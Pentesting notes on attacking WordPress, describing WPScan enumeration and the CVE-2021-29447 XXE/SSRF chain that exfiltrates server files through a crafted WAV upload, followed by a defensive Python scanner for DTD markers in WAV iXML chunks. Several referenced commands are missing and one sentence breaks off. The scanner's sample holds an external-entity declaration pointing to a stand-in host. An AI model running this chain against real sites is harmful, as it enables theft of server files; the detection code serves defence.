Wordpress
Generic methodologies and some CVEs
Enumeration
WPScan is the go-to tool for scanning a WordPress application. It is also worth grabbing an API key for it and configuring your wpscan installation to use it, since the vulnerability data comes from the API.
Wp-Login Brute Force
CVE-2021-29447 / Authenticated XXE & SSRF
If you have media upload rights and WPScan reports this vulnerability, you are in for a treat: it is possible to upload a malicious WAV file.
Using echo with the flags that interpret backslash escapes and suppress the trailing newline, use this one-liner to create the malicious WAV file.
On your box, create the malicious.dtd file and prepare to upload the WAV file to the server. The content of the malicious DTD file should look like this: replace
Use PHP to host malicious.dtd
Upload malicious.wav
As soon as you upload malicious.wav, your PHP web server should receive a GET request with p as the parameter. That parameter holds the requested server file, zlib-compressed and then base64-encoded.
You can then use PHP to decode it.
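From the defender's side, the same chain can be spotted before getID3 ever parses the upload: a legitimate iXML metadata chunk inside a WAV file has no reason to declare a DOCTYPE or an external entity. The following scanner is an added example, not code from the original page or from WordPress; it walks the RIFF chunk list of a WAV file and flags DTD markers in the iXML chunk. The two sample files and the example.invalid host are constructed for the demonstration.

```python
import struct

# Markers an inline DTD would carry; ordinary iXML metadata never declares these.
XXE_MARKERS = (b"<!DOCTYPE", b"<!ENTITY", b"SYSTEM", b"PUBLIC")


def iter_riff_chunks(data):
    """Yield (chunk_id, payload) for every top-level chunk of a RIFF/WAVE file."""
    if len(data) < 12 or data[:4] != b"RIFF" or data[8:12] != b"WAVE":
        raise ValueError("not a RIFF/WAVE file")
    pos = 12
    while pos + 8 <= len(data):
        chunk_id = data[pos:pos + 4]
        size = struct.unpack("<I", data[pos + 4:pos + 8])[0]
        payload = data[pos + 8:pos + 8 + size]
        yield chunk_id, payload
        pos += 8 + size + (size & 1)  # RIFF chunks are padded to an even length


def find_xxe_indicators(data):
    """Return (chunk_id, marker) pairs for DTD markers found in the iXML chunk."""
    hits = []
    for chunk_id, payload in iter_riff_chunks(data):
        if chunk_id != b"iXML":
            continue
        for marker in XXE_MARKERS:
            if marker in payload:
                hits.append((chunk_id.decode(), marker.decode()))
    return hits


def build_wav(ixml_text):
    """Build a minimal WAVE file (constructed sample) carrying one iXML chunk."""
    fmt = struct.pack("<HHIIHH", 1, 1, 8000, 16000, 2, 16)  # PCM, mono, 8 kHz, 16-bit
    body = b""
    for cid, payload in ((b"fmt ", fmt), (b"iXML", ixml_text), (b"data", b"")):
        pad = b"\0" if len(payload) & 1 else b""
        body += cid + struct.pack("<I", len(payload)) + payload + pad
    return b"RIFF" + struct.pack("<I", 4 + len(body)) + b"WAVE" + body


# Constructed samples: plain metadata versus a chunk that pulls in an external DTD.
BENIGN_WAV = build_wav(b"<?xml version='1.0'?><BWFXML><PROJECT>demo</PROJECT></BWFXML>")
SUSPICIOUS_WAV = build_wav(
    b"<?xml version='1.0'?><!DOCTYPE r [<!ENTITY % e SYSTEM "
    b"'http://example.invalid/malicious.dtd'> %e;]><r/>"
)

if __name__ == "__main__":
    for name, wav in (("benign", BENIGN_WAV), ("suspicious", SUSPICIOUS_WAV)):
        print(name, find_xxe_indicators(wav))  # benign -> [], suspicious -> hits
```

Run it as an upload hook or over the wp-content/uploads directory; any hit on a WAV that a user uploaded is worth a closer look, and a WAV with no iXML chunk at all is simply skipped.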